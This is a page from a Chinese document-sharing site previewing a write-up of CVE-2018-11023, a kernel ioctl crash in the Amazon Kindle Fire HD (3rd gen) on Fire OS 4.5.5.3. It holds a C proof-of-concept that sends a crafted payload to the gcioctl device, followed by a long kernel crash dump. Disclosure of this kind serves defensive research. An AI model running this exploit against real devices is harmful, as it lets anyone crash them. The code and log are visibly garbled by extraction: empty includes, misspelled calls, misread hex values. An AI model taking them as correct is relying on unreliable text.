(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:p** 文档编号:493973 上传时间:2023-09-19 格式:DOCX 页数:7 大小:17.46KB
下载 相关 举报
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第6页
第6页 / 共7页
(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第7页
第7页 / 共7页
亲,该文档总共7页,全部预览完了,如果喜欢就下载吧!
资源描述

《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11023)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(7页珍藏版)》请在第壹文秘上搜索。

1、(CVE-2018-11023) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) FireOS 4.5.5.3 的内核组件中的内核模块 omapdriversmiscgcxgcioctlgcif.c 允许攻击者通过设备/ dev 上 ioctl 的参数 注入特制参数/gcioctl使用命令3222560159,并导致内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in t

2、he ioctl interface of device file devgcioctl causes the system crash via IOCTL 3222560159.* This Poc should run with permission to do ioctl on devgcioctl.*/#include #include #include #include const static char *driver = ,devgcioctl;static command = 3222560159;int main(int argcj char *argv, char *env

3、) unsigned int payload = 0x244085aa, 0la03e6ef 0x000003f4, 0x00000000 ;int fd = 0;fd = OPen(driver, O_RDONLY);if (fd datalocaltmplog);return -1;printf(Try open %s with command 0x%x.n”, driver, command); printf(System will crash and reboot.n);if(ioctl(fd command, Spayload) datalocaltmplog);return -1;

4、close(fd);return 0;崩溃日志79.825592 init: untracked pid 3232 exited79.830841 init: untracked pid 3234 exited95.970855 Alignment trap: not handling instruction el953f9f at f395.978912 Unhandled fault: alignment exception (0001) at 0xla03e695.986053 Internal error: : 1 #1 PREEMPT SMP ARM95.991638 Modules

5、 linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)1)95.999145 CPU: 0 Tainted: GO (3.4.83-gd2afc0bae69 #96.006408 PC is at _raw_spin_lock_irqsave+0x38/0xb096.012115 LR is at _raw_spin_lock_irqsave+0xl0/0xl496.017791 pc : lr: psr: 2000009396.017822 sp : d02bfdd8 ip : d02bfdf8 fp : d02bfdf496.030578 rl0:

6、 00000000 r9 : dd3eeca8 r8 : 000000010096.036376 r7 : Ia03e6ef r6 : 00000001 r5 : Ia03e6f3 r4 : d02be0 1396.043701 r3 : 00000001 r2 : 00000001 rl : 00000082 r0 : 20000096.050933 Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user96.058990 Control: 10c5387d Table: 96cb804a DAC: 0000001596.0

7、6546096.065460 PC: 0xc06a4d08:96.070404 4d08 la000003 eaffffe6 e5903000 e3530000 0affffe3 e5903004e3530000996.080810 4d28 eaffffdf e50b0018 ebfffbab e51b0018 eaffffed ela0c00de92dd800 e24cb00496.091217 4d48 ebffffcf e89da800 ela0c00d e92dd878 e24cb004 ela0300de3c34d7f e3c4403f96.101776 4d68 ela05000

8、 e3a06001 e5943004 e2833001 e5843004 el0f0000fl0c0080 el953f9f96.112335 4d88 e3330000 01853f96 e3530000 0a000014 el21f000 e5943004e2433001 e584300496.122894 4da8 e5943000 e3130002 la000010 e5953004 e3530000 e595300005856004 e353000096.133361 4dc8 la000003 eaffffe7 e5953000 e3530000 0affffe4 e5953004

9、e3530000 Iafffff996.143920 4de8 eaffffe0 f57ff05f e5853004 e89da878 ebfffb79 eaffffeeela0c00d e92dd80096.15447996.154479 LR: 0xc06a4d90:96.159393 4d90 e3530000 0a000014 el21f000 e5943004 e2433001 e5843004 e5943000 e313000296.170013 4db0 la000010 e5953004 e3530000 e5953000 05856004 e3530000 la000003

10、eaffffe796.180603 4dd0 e5953000 e3530000 0affffe4 e5953004 e3530000 Iafffff9 eaffffe0 f57ff05f96.191070 4df0 e5853004 e89da878 ebfffb79 eaffffec ela0c00d e92dd800 e24cb004 ebffffcf96.201690 4el0 e89da800 ela0c00d e92dd800 e24cb004 ebfffff6 e89da800 ela0c00d e92dd80096.212341 4e30 e24cb004 ebfffffl e

11、89da800 ela0c00d e92dd818 e24cb004 ebffffc0 ela0400096.222808 4e50 ebe6a978 el21f004 e89da818 ela0c00d e92dd800 e24cb004 ebfffff3 e89da80096.233612 4e70 ela0c00d e92dd830 e24cb004 e24dd008 ela0300d e3c34d7f e3c4403f e3a0500196.24426296.244262 SP: 0xd02bfd58:96.249145 fd58 00000000 0000001d 00000004

12、d4736f80 d4737394 C06a4d84 20000093 ffffffff96.259948 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.270660 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.281311 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 C06a4el0 C06a4d88 20000093 ffffff

13、ff96.292053 fdd8 0000020a 00000082 Ia03e6f3 d02be000 d02bfe04 d02bfdf8 C06a4el0 C06a4d5c96.302825 fdf8 d02bfel4 d02bfe08 C06a4e24 C06a4e0c d02bfe5c d02bfel8 C06a3008 C06a4e2096.313415 fel8 d84a38d8 d84a2800 d84a3800 0000000a d02be000 c33a3180 d02bfe54 Ia03e6ef96.323883 fe38 bed24608 d02b000 d627f000

14、 bed24608 dd3eeca8 00000000 d02bfe6c d02bfe6096.33453396.334533 IP: 0d02bfd78:96.339416 fd78 d02bfdc4 00000001 d02bfdf4 d02bfd90 C06a5318 C0008370 20000013 0000008296.349853 fd98 00000001 00000001 d02be000 Ia03e6f3 00000001 la03e6ef 00000001 dd3eeca896.360290 fdb8 00000000 d02bfdf4 d02bfdf8 d02bfdd8 C06a4el0 C06a4d88 20000093 ffffffff96.370727 fdd8 0000020a 00000082

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > IT计算机 > windows相关

copyright@ 2008-2023 1wenmi网站版权所有

经营许可证编号:宁ICP备2022001189号-1

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第壹文秘网,我们立即给予删除!